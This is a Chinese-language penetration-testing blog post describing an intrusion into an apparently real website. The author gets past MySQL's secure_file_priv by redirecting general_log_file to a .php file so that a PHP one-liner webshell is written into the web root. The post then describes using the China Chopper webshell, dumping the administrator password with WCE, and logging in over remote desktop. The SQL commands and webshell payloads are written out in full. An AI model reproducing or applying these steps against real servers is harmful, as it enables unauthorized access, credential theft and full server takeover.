Mysql root账号general_log_file方法获取webshell

现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取webshell

在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取webshell,下面将整个渗透过程和方法跟大家分享。

1.信息收集

   目标站点访问其子域名,如图1所示,发现该站点是使用phpStudy2014搭建的,通过phpinfo信息泄露,可以获取网站的绝对路径“D:/phpStudy/WWW”,服务器为Windows Server 2003 ,phpstudy探针文件“D:/phpStudy/WWW/l.php”

1.png

2.获取root账号和密码

   phpStudy默认账号为root/root,使用其进行登录,成功登录系统,如果不是这个账号和密码,可以使用phpmyadmin暴力破解工具进行暴力破解,如图2所示,登录后看目前使用的数据应该是www数据库。查看mysql数据库中的user表中的数据,如图3所示,清一色的相同密码。

 2.png

图2获取root账号和密码

 3.png

图3 mysql数据库user表多个账号使用相同密码

3.直接导出webshell失败

   既然知道了网站真实路径“D:/phpStudy/WWW”和root账号,最简单的方法就是直接导出webshell:

select ‘<?php @eval($_POST[cmd]);?>’INTO OUTFILE ‘D:/phpStudy/WWW/cmd.php’,如图4所示,在以往是顺利成章的获取webshell,但这次显示错误信息:

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

意思是Mysql服务器运行“–secure-file-priv”选项,所以不能执行这个语句。

 4.png

图4导出webshell失败

4. secure_file_priv选项

   在mysql中使用secure_file_priv配置项来完成对数据导入导出的限制,前面的webshell导出就是如此,在实际中常常使用语句来导出数据表内容,例如把mydata.user表的数据导出来:

select * from mydata.user into outfile '/home/mysql/user.txt';

在mysql的官方给出了“–secure-file-priv=name Limit LOAD DATA, SELECT … OUTFILE, and LOAD_FILE() to files within specified directory”解释,限制导出导入文件到指定目录,其具体用法:

(1)限制mysqld不允许导入和导出

mysqld --secure_file_prive=null

mysqld –secure_file_prive=null

(2)限制mysqld的导入和导出只能发生在/tmp/目录下

mysqld --secure_file_priv=/tmp/

mysqld –secure_file_priv=/tmp/

(3)不对mysqld 的导入和导出做限制,在/etc/my.cnf文件中不指定值。

5.通过general_log和general_log_file来获取webshell

   mysql打开general log之后,所有的查询语句都可以在general log文件中以可读的方式得到,但是这样general log文件会非常大,所以默认都是关闭的。有的时候为了查错等原因,还是需要暂时打开general log的。换句话说general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。在mysql中执行查询:

set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

set global general_log=’on’;

SET global general_log_file=’D:/phpStudy/WWW/cmd.php’;

SELECT ‘<?php assert($_POST["cmd"]);?>’;

   如图5,图6和图7所示,分别打开general_log开关,设置general_log_file文件,执行查询。

 5.png

图5打开general_log开关

 6.png

图6设置general_log_file文件

 7.png

图7执行webshell查询

6.获取webshell

   在浏览器中打开地址http://******.hy******.cn/cmd.php,如图8所示,会显示mysql查询的一些信息,由于一句话后门通过查询写入了日志文件cmd.php,因此通过中国菜刀一句话后门可以成功获取webshell,如图9所示。

 8.png

图8查看文件

 9.png

图9获取webshell

7.服务器密码获取

  (1)查看服务器权限及用户权限

  通过中国菜刀一句话后门管理工具,打开远程终端命令执行,如图10所示,分别执行“whomai”、“net user”、“net localgroup administrator”命令来查看当前用户的权限,当前系统所有用户,管理员用户情况。

 10.png

\

图10查看当前用户权限

(2)上传wce密码获取工具

    直接执行g86.exe顺利获取管理员密码,如图11所示,开始执行g64.exe没有成功是因为系统是32位操作系统。

 11.png

图11获取管理员密码

8.获取远程终端端口

  通过命令 tasklist /svc | find “TermService”及netstat -ano | find “1792″ 命令来获取当前的3389端口为8369端口,tasklist /svc | find “TermService”获取的是远程终端服务对应的进程号,netstat -ano | find “1792″查看进程号1792所对应的端口,在实际过程中1792值会有变化。

 12.png

图12获取3389端口

9.登录3338

  打开mstsc,在连接地址中输入202.58.***.***:8369,输入获取的管理员和密码进行登录,如图13所示,成功登录服务器。

 13.png

图13登录3389

10.总结

(1)查看genera文件配置情况

show global variables like "%genera%";

show global variables like “%genera%”;

(2)关闭general_log

set global general_log=off;

set global general_log=off;

(3)通过general_log选项来获取webshell

set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

set global general_log=’on’;

SET global general_log_file=’D:/phpStudy/WWW/cmd.php’;

SELECT ‘<?php assert($_POST["cmd"]);?>’;

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值